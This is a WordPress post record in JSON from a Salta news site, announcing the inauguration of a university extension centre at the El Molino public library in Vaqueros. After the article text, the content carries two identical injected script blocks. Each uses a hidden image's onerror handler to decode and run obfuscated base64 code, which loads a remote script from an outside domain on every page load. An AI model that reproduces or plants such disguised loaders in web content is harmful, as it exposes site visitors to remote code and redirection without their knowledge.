{"id":1499,"date":"2022-09-19T11:51:10","date_gmt":"2022-09-19T14:51:10","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1499"},"modified":"2025-08-14T00:35:09","modified_gmt":"2025-08-14T03:35:09","slug":"se-inaugurara-el-centro-de-extension-universitaria-biblioteca-popular-el-molino","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1499","title":{"rendered":"Se inaugurar\u00e1 el Centro de Extensi\u00f3n Universitaria Biblioteca Popular El Molino"},"content":{"rendered":"\n<h5 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#7d0b28\"><em>Ser\u00e1 el viernes 23 de septiembre a las 10. El Centro se ubica en la localidad de Vaqueros, en calle Hnos. Gim\u00e9nez N.250.<\/em><\/h5>\n\n\n\n<p>El viernes 23 de septiembre se &nbsp;inaugurar\u00e1 el Centro de Extensi\u00f3n Universitaria Biblioteca Popular El Molino en Vaqueros. El acto ser\u00e1 a las 10. En la oportunidad el rector de Universidad Nacional de Salta, Daniel Hoyos y &nbsp;Marcela \u00c1lvarez firmar\u00e1n el Convenio de Cooperaci\u00f3n suscripto entre la Universidad Nacional de Salta y la Biblioteca Popular El Molino.<\/p>\n\n\n\n<p>El acto adem\u00e1s contar\u00e1 con la presencia de Marcelo Gea, secretario general de la Universidad; Rub\u00e9n Correa, secretario de Extensi\u00f3n Universitaria; Tane Da Souza Correa, coordinador de Rectorado; y miembros del Gabinete del Rectorado de la UNSa.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/se-inaugurara-el-centro-de-extension-universitaria-biblioteca-popular-el-molino-84949\" target=\"_blank\" rel=\"noreferrer noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Ser\u00e1 el viernes 23 de septiembre a las 10. El Centro se ubica en la localidad de Vaqueros, en calle Hnos. Gim\u00e9nez N.250. El viernes 23 de septiembre se &nbsp;inaugurar\u00e1 el Centro de Extensi\u00f3n Universitaria Biblioteca Popular El Molino en Vaqueros. El acto ser\u00e1 a las 10. En la oportunidad el rector de Universidad Nacional [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1500,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,26],"tags":[],"class_list":{"0":"post-1499","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1499"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1499"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1499\/revisions"}],"predecessor-version":[{"id":7346,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1499\/revisions\/7346"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1500"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1499"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1499"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1499"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}